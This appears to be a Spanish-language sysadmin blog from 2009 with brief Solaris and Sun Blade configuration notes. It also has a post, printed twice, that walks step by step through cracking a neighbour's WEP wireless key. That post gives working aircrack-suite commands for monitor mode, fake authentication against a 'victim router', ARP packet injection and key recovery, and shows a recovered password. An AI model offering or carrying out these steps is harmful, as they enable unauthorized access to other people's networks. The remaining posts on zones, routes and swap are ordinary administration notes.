viernes, 31 de julio de 2009

Creación de Zonas - Solaris

create -b
set zonepath=/zonas/CT1BOZSUNOAS-SPE4
set autoboot=true
set ip-type=exclusive

add net
set physical=nxge1
set physical=nxge2
end

verify
commit

miércoles, 29 de julio de 2009

Como hackear clave WEP en red inalambrica - Wifislax

1.Descargar el cd de wifislax 3.1 desde http://download.wifislax.com:8080/wifislax-3.1.iso. Boot el equipo por cd. En el momento que ya haya terminado de cargar el OS, para cargar el escritorio grafico, colocar como login "root" y password "toor", y finalmente "startx". Seguidamente se debe configurar la interfaz de red como monitor sobre el canal en el que se encuentre el ESSID.

wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng.

NOTA: con este comando configuramos tambien la interfas en modo monitor

#airmon-ng start wifi0 6

2.#iwconfig , para revisar la configuracion en la que quedo la interfaz de red en este caso la interfaz de red se llama wifi0.

3.Configuramos la velocidad de transmision a 1MB para evitar problemas de transmision


#iwconfig wifi0 rate 1M


4.Despues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar redes por el canal 6. Para esto utilizamos el siguiente comando:

#airodump-ng -w aaaa -c6 wifi0


donde aaaa puede ser cualquier archivo.


NOTA: tambien se puede hacer de la siguiente manera:

wifislax-> Herramientas wireless -> Kismet .

Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:

Dispositivo: wifi0

Driver: ipw2915

Nombre: wifislax


En este ejemploencontramos una ESSID: LD, BSSID: 00:24:01:24:AD:FF, ENCHRIPTER: WEB, CHANNEL: 6


5.Seguidamente despues de haber escogido la red con encriptacion wep que vamos a atacar, ejecutamos el siguiente comando:

#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0


En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:

…...

Enviando peticion de autentificacion

Autentificacion conseguida

Enviando peticion de asociacion

Asociacion conseguida


6.Ahora empezaremmos a inyectar paquetes usando el siguiente comando:


#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0


Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.

7.Logrando la cantidad de paquetes indicado procedemos a encontrar la clave. Para esto haremos uso del siguiente comando:

#aircrack-ptw LD-01.cap


Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz.

Este comando me entregara la clave tanto en exadecimal como en su equivalente ASCII:

….

Equivalente en ASCII: LADINO4763356

Como hackear clave WEP en red inalambrica - Wifislax

1. Configurar la interfaz de red en modo "Monitor" sobre el canal en el que se encuentra el ESSID.

wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng

NOTA: con este comando configuramos tambien la interfas en modo monitor

#airmon-ng start wifi0 6

2. #iwconfig, para revisar la configuracion en la que quedó la interfaz de red, en este caso la interfaz de red se llama wifi0.

3. Configuramos la velocidad de transmisión a 1MB para evitar problemas de transmisión.

#iwconfig wifi0 rate 1M

4. Desues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar las redes que se encuentren en el canal 6 por el cual nuestra interfaz esta escuchando. Para esto utilizamos el siguiente comando:

#airodump-ng -w aaaa -c6 wifi0

donde aaaa puede ser cualquier nombre para este archivo.


NOTA: tambien se puede hacer de la siguiente manera:

wifislax-> Herramientas wireless -> Kismet .

Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:

Dispositivo: wifi0

Driver: ipw2915

Nombre: wifislax

En este ejemplo encontramos una ESSID:LD, BSSID: 00:24:01:24:AD:FF, ENCHRIPTER: WEB, CHANNEL: 6

5. Seguidamente despues de haber escogido la red con encriptacino WEP que vamos a atacar, ejecutamos el siguiente comando:

#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0


En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:

…...

Enviando peticion de autentificacion

Autentificacion conseguida

Enviando peticion de asociacion

Asociacion conseguida

6. Ahora empezaremos a intectar paquetes usando el siguiente comando:

#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0

Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.


7. Logrando la cantidad de paquetes indicado procederemos a encontrar la clave. Para esto haremos uso del siguiente comando:

#aircrack-ptw LD-01.cap

Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz. Este comando me entrega la clave tanto en exadecimal como en su equivalente ASCII.

.....

Equivalente en ASCII: LADINO4763356



Congratulations!!! Clave detectada!!!

lunes, 27 de julio de 2009

Configuracion Interfaz BMC Sun Blade 6250

//Este es un ejemplo aplicado a la BL9 del chasis 1

-> set /CH/BL9/SP/network pendingipaddress=172.28.236.29
-> set /CH/BL9/SP/network pendingipdiscovery=static
-> set /CH/BL9/SP/network pendingipgateway=172.28.239.254
-> set /CH/BL9/SP/network pendingipnetmask=255.255.252.0
-> set /CH/BL9/SP/network commitpending=true

//Muestra la configuracion de Red para esa blade
-> show /CH/BL9/SP/network

viernes, 10 de julio de 2009

Agregar rutas estaticas - Solaris

//Para ver las rutas estaticas actualmente fijadas en la maquina se ejecuta el siguiente comando

# netstat -rn

Routing Table: IPv4
Destination Gateway Flags Ref Use Interface
-------------------- -------------------- ----- ----- ------ ---------
172.28.250.98 172.28.250.98 UGH 1 0
172.28.250.99 172.28.250.99 UGH 1 0
172.28.250.97 172.28.250.97 UGH 1 481
172.28.250.100 172.28.250.100 UGH 1 272
172.28.250.101 172.28.250.101 UGH 1 3
172.20.45.231 172.20.45.231 UGH 1 0
172.20.45.230 172.20.45.230 UGH 1 0
192.168.100.0 192.168.100.1 U 1 0 bge853000:1
140.126.65.0 140.126.65.1 U 1 0 bge45000:1
172.16.150.0 172.28.249.254 UG 1 3
172.20.45.0 172.20.45.14 U 1 30197 bge45000:2
172.20.45.0 172.20.45.14 U 1 0 bge45000
172.20.45.0 172.20.45.14 U 1 6692 bge45001
172.28.248.0 172.28.250.94 U 1 198287 bge853000:2
172.28.248.0 172.28.250.94 U 1 0 bge853000
172.28.248.0 172.28.250.94 U 1 10591 bge853001
172.28.0.0 172.28.251.254 UG 1 12905
224.0.0.0 172.28.250.94 U 1 0 bge853000:2
default 172.20.45.250 UG 1 5985
127.0.0.1 127.0.0.1 UH 7626145638 lo0

//Agregando una ruta para acceder a una red
# route add net 192.168.16.0 10.0.2.15 //Para acceder a la red 192.168.16.0, lo voy a hacer desde la gateway 10.0.2.15

//Removiendo una ruta para acceder a una red
# route delete net 192.168.16.0 10.0.2.15

viernes, 3 de julio de 2009

Como Agregar tamaño a la Swap - Solaris

#mkfile 2g /opt/swapfile //Estamos creando un archivo de tamaño 2GB llamado swapfile

#swap -a /opt/swapfile //Con esto estoy habilitando el archivo creado para que se adhiera a la swap actual